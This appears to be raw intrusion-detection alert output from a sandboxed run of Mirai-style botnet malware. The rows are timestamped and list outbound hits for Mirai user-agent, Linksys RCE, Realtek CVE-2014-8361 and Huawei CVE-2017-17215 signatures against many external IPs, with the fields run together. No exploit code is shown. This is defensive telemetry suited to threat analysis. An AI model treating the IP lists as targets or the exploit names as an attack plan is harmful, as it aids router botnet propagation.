              192.168.2.2395.117.110.4739132802027121 05/14/22-02:19:54.486284TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3913280192.168.2.2395.117.110.47
              192.168.2.23172.65.100.5848116555552027153 05/14/22-02:20:33.576896TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4811655555192.168.2.23172.65.100.58
              192.168.2.2395.216.22.20338146802027121 05/14/22-02:21:29.004701TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3814680192.168.2.2395.216.22.203
              192.168.2.23172.65.181.24432864555552027153 05/14/22-02:20:08.849218TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3286455555192.168.2.23172.65.181.244
              192.168.2.23172.65.93.25539622555552027153 05/14/22-02:21:27.712648TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3962255555192.168.2.23172.65.93.255
              192.168.2.2395.205.109.4436654802027121 05/14/22-02:20:28.683925TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3665480192.168.2.2395.205.109.44
              192.168.2.2395.249.69.12654336802027121 05/14/22-02:20:46.647552TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5433680192.168.2.2395.249.69.126
              192.168.2.2395.140.157.17438300802027121 05/14/22-02:20:58.303872TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3830080192.168.2.2395.140.157.174
              192.168.2.2395.211.102.2938412802027121 05/14/22-02:20:55.931558TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3841280192.168.2.2395.211.102.29
              192.168.2.2395.56.253.8939030802027121 05/14/22-02:20:46.744227TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3903080192.168.2.2395.56.253.89
              192.168.2.2395.168.248.17436364802027121 05/14/22-02:19:46.145602TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3636480192.168.2.2395.168.248.174
              192.168.2.2395.65.73.15159576802027121 05/14/22-02:20:37.010160TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5957680192.168.2.2395.65.73.151
              192.168.2.23172.65.155.6251970555552027153 05/14/22-02:19:47.505809TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5197055555192.168.2.23172.65.155.62
              192.168.2.23112.211.70.22750280802027121 05/14/22-02:19:53.094256TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5028080192.168.2.23112.211.70.227
              192.168.2.2398.159.33.5059304555552027153 05/14/22-02:20:51.688681TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5930455555192.168.2.2398.159.33.50
              192.168.2.2395.100.74.15834890802027121 05/14/22-02:21:41.908330TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3489080192.168.2.2395.100.74.158
              192.168.2.2395.79.119.17258308802027121 05/14/22-02:20:02.472815TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5830880192.168.2.2395.79.119.172
              192.168.2.2395.179.231.25254070802027121 05/14/22-02:20:36.835389TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5407080192.168.2.2395.179.231.252
              192.168.2.2395.165.141.1752550802027121 05/14/22-02:20:13.742226TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5255080192.168.2.2395.165.141.17
              192.168.2.23172.65.246.8633864555552027153 05/14/22-02:20:23.034239TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3386455555192.168.2.23172.65.246.86
              192.168.2.2395.180.163.7541450802027121 05/14/22-02:19:46.154023TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4145080192.168.2.2395.180.163.75
              192.168.2.2395.217.140.5242126802027121 05/14/22-02:21:20.773526TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4212680192.168.2.2395.217.140.52
              192.168.2.23156.226.103.18840742528692027339 05/14/22-02:20:20.197589TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4074252869192.168.2.23156.226.103.188
              192.168.2.23112.168.6.11954502802027121 05/14/22-02:20:26.062520TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5450280192.168.2.23112.168.6.119
              192.168.2.2395.252.1.15559942802027121 05/14/22-02:20:52.532968TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5994280192.168.2.2395.252.1.155
              192.168.2.2395.175.112.17855928802027121 05/14/22-02:20:55.951615TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5592880192.168.2.2395.175.112.178
              192.168.2.23172.65.197.13350746555552027153 05/14/22-02:19:52.156166TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5074655555192.168.2.23172.65.197.133
              192.168.2.23156.226.54.9434720528692027339 05/14/22-02:20:37.007206TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3472052869192.168.2.23156.226.54.94
              192.168.2.2395.31.137.23139652802027121 05/14/22-02:19:58.907121TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3965280192.168.2.2395.31.137.231
              192.168.2.23172.65.68.12155652555552027153 05/14/22-02:21:20.746079TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5565255555192.168.2.23172.65.68.121
              192.168.2.23172.65.215.11559892555552027153 05/14/22-02:21:25.372980TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5989255555192.168.2.23172.65.215.115
              192.168.2.2395.217.20.8343432802027121 05/14/22-02:20:35.403881TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4343280192.168.2.2395.217.20.83
              192.168.2.2395.213.134.11649508802027121 05/14/22-02:20:17.990482TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4950880192.168.2.2395.213.134.116
              192.168.2.2341.79.207.12158786372152835222 05/14/22-02:19:44.065785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878637215192.168.2.2341.79.207.121
              192.168.2.23172.65.245.8939670555552027153 05/14/22-02:21:23.054578TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3967055555192.168.2.23172.65.245.89
              192.168.2.2395.173.110.5153424802027121 05/14/22-02:20:13.713836TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5342480192.168.2.2395.173.110.51
              192.168.2.2395.100.182.6546118802027121 05/14/22-02:20:28.675028TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4611880192.168.2.2395.100.182.65
              192.168.2.23172.65.225.3953180555552027153 05/14/22-02:20:49.354114TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5318055555192.168.2.23172.65.225.39
              192.168.2.2395.213.135.654294802027121 05/14/22-02:20:23.671991TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5429480192.168.2.2395.213.135.6
              192.168.2.2395.100.50.6657492802027121 05/14/22-02:20:13.699597TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5749280192.168.2.2395.100.50.66
              192.168.2.2395.100.32.13358698802027121 05/14/22-02:20:13.688657TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5869880192.168.2.2395.100.32.133
              192.168.2.23172.65.223.17758740555552027153 05/14/22-02:21:31.972177TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5874055555192.168.2.23172.65.223.177
              192.168.2.2395.56.129.3258322802027121 05/14/22-02:20:08.154351TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5832280192.168.2.2395.56.129.32
              192.168.2.23156.254.36.10533430528692027339 05/14/22-02:21:42.664037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3343052869192.168.2.23156.254.36.105
              192.168.2.23172.65.235.15937460555552027153 05/14/22-02:21:18.255396TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3746055555192.168.2.23172.65.235.159
              192.168.2.2395.130.153.19445406802027121 05/14/22-02:19:46.130154TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4540680192.168.2.2395.130.153.194
              192.168.2.23172.81.132.23054932555552027153 05/14/22-02:20:55.243185TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5493255555192.168.2.23172.81.132.230
              192.168.2.2395.67.139.3048052802027121 05/14/22-02:21:23.021939TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4805280192.168.2.2395.67.139.30
              192.168.2.23172.65.126.21549052555552027153 05/14/22-02:20:55.145531TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4905255555192.168.2.23172.65.126.215
              192.168.2.2395.215.208.10044116802027121 05/14/22-02:20:11.932503TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4411680192.168.2.2395.215.208.100
              192.168.2.2395.161.129.14741284802027121 05/14/22-02:20:28.494539TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4128480192.168.2.2395.161.129.147
              192.168.2.2395.154.217.9559972802027121 05/14/22-02:20:47.972023TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5997280192.168.2.2395.154.217.95
              192.168.2.2395.49.216.13936748802027121 05/14/22-02:19:48.985166TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3674880192.168.2.2395.49.216.139
              192.168.2.2395.100.123.17840392802027121 05/14/22-02:20:00.008786TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4039280192.168.2.2395.100.123.178
              192.168.2.2395.100.177.15936576802027121 05/14/22-02:20:47.978053TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3657680192.168.2.2395.100.177.159
              192.168.2.23172.65.10.6541558555552027153 05/14/22-02:19:41.124619TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4155855555192.168.2.23172.65.10.65
              192.168.2.2395.56.61.3540458802027121 05/14/22-02:20:20.282000TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4045880192.168.2.2395.56.61.35
              192.168.2.23112.199.65.7034510802027121 05/14/22-02:19:54.462588TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3451080192.168.2.23112.199.65.70
              192.168.2.23172.247.3.22537104555552027153 05/14/22-02:20:30.363275TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3710455555192.168.2.23172.247.3.225
              192.168.2.23156.244.73.20959122528692027339 05/14/22-02:20:43.778827TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5912252869192.168.2.23156.244.73.209
              192.168.2.23172.65.211.11441284555552027153 05/14/22-02:21:29.853420TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4128455555192.168.2.23172.65.211.114
              192.168.2.2395.56.22.6955278802027121 05/14/22-02:20:26.260830TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5527880192.168.2.2395.56.22.69
              192.168.2.2395.168.58.1648764802027121 05/14/22-02:20:26.110701TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4876480192.168.2.2395.168.58.16
              192.168.2.23172.245.211.24045458555552027153 05/14/22-02:19:52.139359TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4545855555192.168.2.23172.245.211.240
              192.168.2.2395.85.25.4345908802027121 05/14/22-02:20:13.713545TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4590880192.168.2.2395.85.25.43
              192.168.2.2395.103.94.7859840802027121 05/14/22-02:21:23.075620TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5984080192.168.2.2395.103.94.78
              192.168.2.2395.216.99.21346012802027121 05/14/22-02:20:50.314457TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4601280192.168.2.2395.216.99.213
              192.168.2.2395.154.210.13841746802027121 05/14/22-02:20:29.923500TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4174680192.168.2.2395.154.210.138
              192.168.2.23172.65.166.23540510555552027153 05/14/22-02:20:18.663926TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4051055555192.168.2.23172.65.166.235
              192.168.2.2395.140.152.6056948802027121 05/14/22-02:20:58.168915TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5694880192.168.2.2395.140.152.60
              192.168.2.23172.65.218.20539286555552027153 05/14/22-02:19:45.210598TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3928655555192.168.2.23172.65.218.205
              192.168.2.2395.67.254.845916802027121 05/14/22-02:20:50.411338TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4591680192.168.2.2395.67.254.8
              192.168.2.2395.101.94.22359806802027121 05/14/22-02:20:52.525988TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5980680192.168.2.2395.101.94.223
              192.168.2.2395.211.117.10540092802027121 05/14/22-02:20:17.709606TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4009280192.168.2.2395.211.117.105
              192.168.2.23172.65.236.3652408555552027153 05/14/22-02:20:13.316366TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5240855555192.168.2.23172.65.236.36
              192.168.2.2395.101.41.24350612802027121 05/14/22-02:20:08.506868TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5061280192.168.2.2395.101.41.243
              192.168.2.2395.100.221.12455808802027121 05/14/22-02:20:46.643939TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5580880192.168.2.2395.100.221.124
              192.168.2.2395.85.3.838146802027121 05/14/22-02:20:54.768744TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3814680192.168.2.2395.85.3.8
              192.168.2.23172.65.106.4347764555552027153 05/14/22-02:20:49.336809TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4776455555192.168.2.23172.65.106.43
              192.168.2.23172.65.126.20444174555552027153 05/14/22-02:21:04.074579TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4417455555192.168.2.23172.65.126.204
              192.168.2.23172.65.102.11154778555552027153 05/14/22-02:20:37.064924TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5477855555192.168.2.23172.65.102.111
              192.168.2.23172.65.55.16553072555552027153 05/14/22-02:21:10.451979TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5307255555192.168.2.23172.65.55.165
              192.168.2.23172.65.238.15539812555552027153 05/14/22-02:20:15.584199TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3981255555192.168.2.23172.65.238.155
              192.168.2.23172.65.48.20460354555552027153 05/14/22-02:21:29.870634TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6035455555192.168.2.23172.65.48.204
              192.168.2.2395.159.0.23847072802027121 05/14/22-02:19:46.170608TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4707280192.168.2.2395.159.0.238
              192.168.2.23172.65.182.10258972555552027153 05/14/22-02:20:51.596070TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5897255555192.168.2.23172.65.182.102
              192.168.2.2395.58.157.14049154802027121 05/14/22-02:20:52.612041TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4915480192.168.2.2395.58.157.140
              192.168.2.2395.158.181.24746568802027121 05/14/22-02:21:41.997139TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4656880192.168.2.2395.158.181.247
              192.168.2.2395.101.71.2948646802027121 05/14/22-02:20:26.090268TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4864680192.168.2.2395.101.71.29
              192.168.2.23112.72.11.20659084802027121 05/14/22-02:19:47.583781TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5908480192.168.2.23112.72.11.206
              192.168.2.23172.65.21.15535856555552027153 05/14/22-02:20:51.595566TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3585655555192.168.2.23172.65.21.155
              192.168.2.23172.65.150.23248246555552027153 05/14/22-02:21:18.255502TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4824655555192.168.2.23172.65.150.232
              192.168.2.2395.89.187.10258358802027121 05/14/22-02:20:17.684228TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5835880192.168.2.2395.89.187.102
              192.168.2.2395.179.195.10640482802027121 05/14/22-02:20:52.518767TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4048280192.168.2.2395.179.195.106
              192.168.2.23172.65.99.8937294555552027153 05/14/22-02:20:49.336736TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3729455555192.168.2.23172.65.99.89
              192.168.2.2395.159.23.5440212802027121 05/14/22-02:20:36.885865TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4021280192.168.2.2395.159.23.54
              192.168.2.2395.214.251.13845916802027121 05/14/22-02:20:40.684147TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4591680192.168.2.2395.214.251.138
              192.168.2.23172.65.148.20538814555552027153 05/14/22-02:20:57.564197TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3881455555192.168.2.23172.65.148.205
              192.168.2.23172.65.189.8747034555552027153 05/14/22-02:20:16.017978TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4703455555192.168.2.23172.65.189.87
              192.168.2.23172.65.1.20842544555552027153 05/14/22-02:20:39.510465TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4254455555192.168.2.23172.65.1.208
              192.168.2.2395.51.20.5055028802027121 05/14/22-02:20:43.929385TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5502880192.168.2.2395.51.20.50
              192.168.2.23172.65.250.6935864555552027153 05/14/22-02:20:01.298980TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3586455555192.168.2.23172.65.250.69
              192.168.2.23172.245.77.5953270555552027153 05/14/22-02:19:52.182191TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5327055555192.168.2.23172.245.77.59
              192.168.2.23172.65.190.10558068555552027153 05/14/22-02:20:18.663728TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5806855555192.168.2.23172.65.190.105
              192.168.2.2395.216.99.21346096802027121 05/14/22-02:20:52.532593TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4609680192.168.2.2395.216.99.213
              192.168.2.23112.164.248.24352370802027121 05/14/22-02:20:44.164196TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5237080192.168.2.23112.164.248.243
              192.168.2.23172.65.187.11833690555552027153 05/14/22-02:21:25.372611TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3369055555192.168.2.23172.65.187.118
              192.168.2.23172.255.81.24951928555552027153 05/14/22-02:20:37.030447TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5192855555192.168.2.23172.255.81.249
              192.168.2.2395.217.105.18639746802027121 05/14/22-02:20:26.046847TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3974680192.168.2.2395.217.105.186
              192.168.2.2395.212.135.17251110802027121 05/14/22-02:20:32.203168TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5111080192.168.2.2395.212.135.172
              192.168.2.2395.56.77.2843922802027121 05/14/22-02:19:52.752680TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4392280192.168.2.2395.56.77.28
              192.168.2.2395.88.166.6043526802027121 05/14/22-02:20:58.091978TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4352680192.168.2.2395.88.166.60
              192.168.2.2395.216.249.18055858802027121 05/14/22-02:19:48.967211TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5585880192.168.2.2395.216.249.180
              192.168.2.2395.129.58.14840528802027121 05/14/22-02:19:59.897192TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4052880192.168.2.2395.129.58.148
              192.168.2.2395.130.41.5755030802027121 05/14/22-02:21:39.694247TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5503080192.168.2.2395.130.41.57
              192.168.2.23156.247.23.14933140528692027339 05/14/22-02:20:04.128716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3314052869192.168.2.23156.247.23.149
              192.168.2.2395.216.145.15458058802027121 05/14/22-02:20:43.914921TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5805880192.168.2.2395.216.145.154
              192.168.2.2395.174.218.18143366802027121 05/14/22-02:20:08.056947TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4336680192.168.2.2395.174.218.181
              192.168.2.2395.203.43.20546484802027121 05/14/22-02:19:48.978854TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4648480192.168.2.2395.203.43.205
              192.168.2.2395.67.207.24937450802027121 05/14/22-02:20:13.786820TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3745080192.168.2.2395.67.207.249
              192.168.2.23172.65.158.24753372555552027153 05/14/22-02:21:29.853164TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5337255555192.168.2.23172.65.158.247
              192.168.2.23172.65.174.7959670555552027153 05/14/22-02:21:29.853526TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5967055555192.168.2.23172.65.174.79
              192.168.2.23112.211.168.7051170802027121 05/14/22-02:20:44.370088TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5117080192.168.2.23112.211.168.70
              192.168.2.2395.183.14.15040654802027121 05/14/22-02:20:28.453314TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4065480192.168.2.2395.183.14.150
              192.168.2.2395.110.156.2850126802027121 05/14/22-02:20:37.002385TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5012680192.168.2.2395.110.156.28
              192.168.2.2395.255.123.23145990802027121 05/14/22-02:20:58.151438TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4599080192.168.2.2395.255.123.231
              192.168.2.2395.216.218.3652794802027121 05/14/22-02:20:36.849112TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5279480192.168.2.2395.216.218.36
              192.168.2.2395.57.137.4435764802027121 05/14/22-02:19:47.603593TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3576480192.168.2.2395.57.137.44
              192.168.2.2395.217.237.5248506802027121 05/14/22-02:19:59.979384TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4850680192.168.2.2395.217.237.52
              192.168.2.23172.65.143.19140842555552027153 05/14/22-02:20:01.315968TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4084255555192.168.2.23172.65.143.191
              192.168.2.23172.65.157.11938330555552027153 05/14/22-02:21:10.434660TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3833055555192.168.2.23172.65.157.119
              192.168.2.2395.67.236.10434772802027121 05/14/22-02:21:12.051253TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3477280192.168.2.2395.67.236.104
              192.168.2.23172.65.130.3049426555552027153 05/14/22-02:20:15.584018TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4942655555192.168.2.23172.65.130.30
              192.168.2.2395.211.77.13344586802027121 05/14/22-02:20:11.849716TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4458680192.168.2.2395.211.77.133
              192.168.2.2395.100.113.20547404802027121 05/14/22-02:20:58.154043TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4740480192.168.2.2395.100.113.205
              192.168.2.2395.216.123.8133790802027121 05/14/22-02:20:14.957069TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3379080192.168.2.2395.216.123.81
              192.168.2.2395.164.215.2837200802027121 05/14/22-02:19:59.939204TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3720080192.168.2.2395.164.215.28
              192.168.2.23172.65.156.12945514555552027153 05/14/22-02:21:37.096756TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4551455555192.168.2.23172.65.156.129
              192.168.2.2395.142.35.11147804802027121 05/14/22-02:20:20.225240TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4780480192.168.2.2395.142.35.111
              192.168.2.2395.56.128.19952794802027121 05/14/22-02:21:25.420858TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5279480192.168.2.2395.56.128.199
              192.168.2.2395.179.134.15433580802027121 05/14/22-02:21:30.293865TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3358080192.168.2.2395.179.134.154
              192.168.2.2395.100.114.23559868802027121 05/14/22-02:20:43.921036TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5986880192.168.2.2395.100.114.235
              192.168.2.2395.71.190.16349970802027121 05/14/22-02:21:09.608021TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4997080192.168.2.2395.71.190.163
              192.168.2.2395.56.81.233788802027121 05/14/22-02:20:17.887528TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3378880192.168.2.2395.56.81.2
              192.168.2.2395.179.217.343272802027121 05/14/22-02:20:36.987400TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4327280192.168.2.2395.179.217.3
              192.168.2.2395.174.24.16455000802027121 05/14/22-02:20:54.836620TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5500080192.168.2.2395.174.24.164
              192.168.2.2395.159.60.2346124802027121 05/14/22-02:19:49.002413TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4612480192.168.2.2395.159.60.23
              192.168.2.2395.123.96.9247868802027121 05/14/22-02:21:23.157498TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4786880192.168.2.2395.123.96.92
              192.168.2.2395.142.201.7333410802027121 05/14/22-02:19:59.919200TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3341080192.168.2.2395.142.201.73
              192.168.2.23156.250.21.933852528692027339 05/14/22-02:21:37.167899TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385252869192.168.2.23156.250.21.9
              192.168.2.23112.162.42.6537238802027121 05/14/22-02:21:05.132195TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3723880192.168.2.23112.162.42.65
              192.168.2.2395.65.90.20744420802027121 05/14/22-02:19:59.922507TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4442080192.168.2.2395.65.90.207
              192.168.2.23172.65.246.5550246555552027153 05/14/22-02:21:07.858957TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5024655555192.168.2.23172.65.246.55
              192.168.2.23172.65.153.7557824555552027153 05/14/22-02:20:33.577012TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5782455555192.168.2.23172.65.153.75
              192.168.2.2395.158.35.552018802027121 05/14/22-02:21:18.541626TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5201880192.168.2.2395.158.35.5
              192.168.2.23172.65.121.19447748555552027153 05/14/22-02:21:37.097695TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4774855555192.168.2.23172.65.121.194
              192.168.2.23172.65.46.9249768555552027153 05/14/22-02:19:50.762314TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4976855555192.168.2.23172.65.46.92
              192.168.2.2395.183.39.5652654802027121 05/14/22-02:20:40.567791TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5265480192.168.2.2395.183.39.56
              192.168.2.23172.65.25.133590555552027153 05/14/22-02:20:16.586055TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3359055555192.168.2.23172.65.25.1
              192.168.2.23172.65.119.24644332555552027153 05/14/22-02:20:53.960011TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4433255555192.168.2.23172.65.119.246
              192.168.2.23156.254.47.9944390528692027339 05/14/22-02:20:39.243330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4439052869192.168.2.23156.254.47.99
              192.168.2.2395.159.56.22951360802027121 05/14/22-02:21:27.667354TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5136080192.168.2.2395.159.56.229
              192.168.2.2395.255.0.22943012802027121 05/14/22-02:20:07.917097TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4301280192.168.2.2395.255.0.229
              192.168.2.2395.100.190.25152178802027121 05/14/22-02:20:20.214296TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5217880192.168.2.2395.100.190.251
